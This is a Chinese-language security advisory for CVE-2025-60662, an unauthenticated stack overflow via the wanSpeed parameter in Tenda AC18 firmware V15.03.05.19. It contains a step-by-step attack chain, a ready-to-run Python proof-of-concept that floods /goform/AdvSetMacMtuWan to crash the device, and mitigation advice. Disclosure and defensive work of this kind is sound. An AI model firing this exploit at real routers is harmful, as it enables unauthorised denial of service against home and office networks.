CVE-2025-60662：Tenda AC18路由器栈溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60662

漏洞类型

栈溢出（Stack Buffer Overflow）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AC18 路由器

漏洞概述

CVE-2025-60662是Tenda AC18路由器固件V15.03.05.19版本中存在的栈缓冲区溢出漏洞。该漏洞存在于路由器的fromAdvSetMacMtuWan函数中，具体由wanSpeed参数触发。攻击者可通过向目标设备发送特制的网络请求，利用该参数未进行充分长度校验的缺陷，向栈缓冲区写入超出其容量的数据，从而覆盖返回地址或其他关键栈帧数据。

该漏洞的CVSS 3.1评分为7.5分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何认证（PR:N）和用户交互（UI:N），这意味着远程未授权攻击者可以直接利用此漏洞发起攻击。虽然机密性和完整性影响较低，但该漏洞对系统可用性具有高影响（A:H），可能导致设备崩溃、服务中断，甚至在特定条件下实现远程代码执行。

Tenda AC18是一款广泛应用于家庭和小型办公环境的无线路由器，由于其通常部署在网络边界且长期运行，此类高危漏洞对用户网络安全构成严重威胁。漏洞已于2025年10月2日被公开披露，并提供了详细的参考链接和概念验证（PoC）信息。鉴于该漏洞利用难度低、影响范围明确，安全研究人员和管理员应及时采取相应的防护措施。

技术细节

该漏洞的根本原因在于Tenda AC18路由器固件V15.03.05.19的fromAdvSetMacMtuWan函数在处理wanSpeed参数时，未对用户输入数据进行有效的长度验证。当攻击者通过HTTP请求向该函数提交超长字符串作为wanSpeed参数的值时，该字符串会被复制到栈上的固定大小缓冲区中，导致栈缓冲区溢出。

从技术层面分析，fromAdvSetMacMtuWan函数负责处理与WAN口MTU（最大传输单元）和MAC地址相关的设置请求。在正常的设置流程中，wanSpeed参数通常包含有限的配置值，但在实现过程中缺乏对输入长度的边界检查。攻击者可以利用这一缺陷，构造包含恶意数据的HTTP POST请求，将远超缓冲区容量的数据写入栈内存。

栈溢出的危害主要体现在以下几个方面：首先，溢出数据可能覆盖函数的返回地址，从而劫持程序控制流；其次，可能覆盖栈上的其他局部变量或保存的寄存器值，破坏程序的正常执行逻辑；最后，在最严重的情况下，攻击者可以通过精心构造的ROP（Return-Oriented Programming）链或shellcode实现远程代码执行，获得设备的完全控制权。

由于该漏洞无需认证即可利用，且攻击复杂度极低，攻击者只需向暴露在网络中的Tenda AC18路由器发送一个精心构造的HTTP请求即可触发漏洞。这使得该漏洞特别容易被蠕虫化利用，对大规模部署的Tenda AC18设备构成严重的安全风险。

攻击链分析

STEP 1

步骤1：目标识别与信息收集

攻击者通过网络扫描工具（如Shodan、ZoomEye或Nmap）识别暴露在公网上的Tenda AC18路由器设备，确认目标固件版本为V15.03.05.19。

STEP 2

步骤2：构造恶意请求

攻击者构造包含超长wanSpeed参数的HTTP POST请求，目标路径为/goform/AdvSetMacMtuWan，该请求将触发fromAdvSetMacMtuWan函数中的栈缓冲区溢出。

STEP 3

步骤3：发送攻击载荷

攻击者通过未认证的网络连接向目标路由器发送恶意HTTP请求，由于无需认证（PR:N）和用户交互（UI:N），攻击可完全自动化执行。

STEP 4

步骤4：触发栈溢出

目标设备的fromAdvSetMacMtuWan函数在处理超长wanSpeed参数时，将数据复制到栈上的固定大小缓冲区，导致栈内存被覆盖，破坏程序执行流程。

STEP 5

步骤5：拒绝服务或代码执行

栈溢出导致路由器进程崩溃，设备失去响应（拒绝服务）；在更严重的情况下，攻击者可通过精心构造的ROP链实现远程代码执行，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-60662 - Tenda AC18 Stack Overflow PoC
Vulnerability: Stack buffer overflow via wanSpeed parameter in fromAdvSetMacMtuWan function
Target: Tenda AC18 V15.03.05.19
Author: Security Researcher
"""

import requests
import sys

def exploit(target_ip, target_port=80):
    """
    Exploit the stack overflow vulnerability in fromAdvSetMacMtuWan function
    by sending an oversized wanSpeed parameter.
    """
    target_url = f"http://{target_ip}:{target_port}/goform/AdvSetMacMtuWan"
    
    # Construct the payload with an oversized wanSpeed parameter
    # The buffer overflow occurs when wanSpeed exceeds the expected length
    overflow_data = "A" * 1024  # Adjust length based on buffer size
    
    payload = {
        "wanSpeed": overflow_data,
        # Additional parameters that may be required by the function
        "MTU": "1500",
        "mac": "00:11:22:33:44:55"
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-60662)",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"http://{target_ip}:{target_port}/login.html"
    }
    
    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Payload size: {len(overflow_data)} bytes")
        
        response = requests.post(
            target_url,
            data=payload,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        
        # Check if the device crashed or responded abnormally
        if response.status_code == 500 or "error" in response.text.lower():
            print("[+] Target may be vulnerable!")
        else:
            print("[*] Request sent successfully")
            
    except requests.exceptions.Timeout:
        print("[+] Target appears to have crashed (timeout) - likely vulnerable!")
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused - target may have crashed!")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [target_port]")
        print(f"Example: {sys.argv[0]} 192.168.0.1 80")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit(target_ip, target_port)

影响范围

Tenda AC18 V15.03.05.19

防御指南

临时缓解措施

在官方补丁发布之前，建议用户立即采取以下临时缓解措施：1）将Tenda AC18路由器置于防火墙或NAT之后，避免将Web管理界面直接暴露在公网上；2）通过路由器管理界面禁用远程管理（Remote Management）功能，确保仅局域网内可访问管理页面；3）在网络边界部署入侵防御系统（IPS），编写规则阻止包含超长wanSpeed参数的HTTP POST请求；4）定期备份路由器配置，关注厂商安全公告，及时更新固件；5）如非必要使用该型号路由器，建议暂时更换为其他安全状态良好的路由器设备。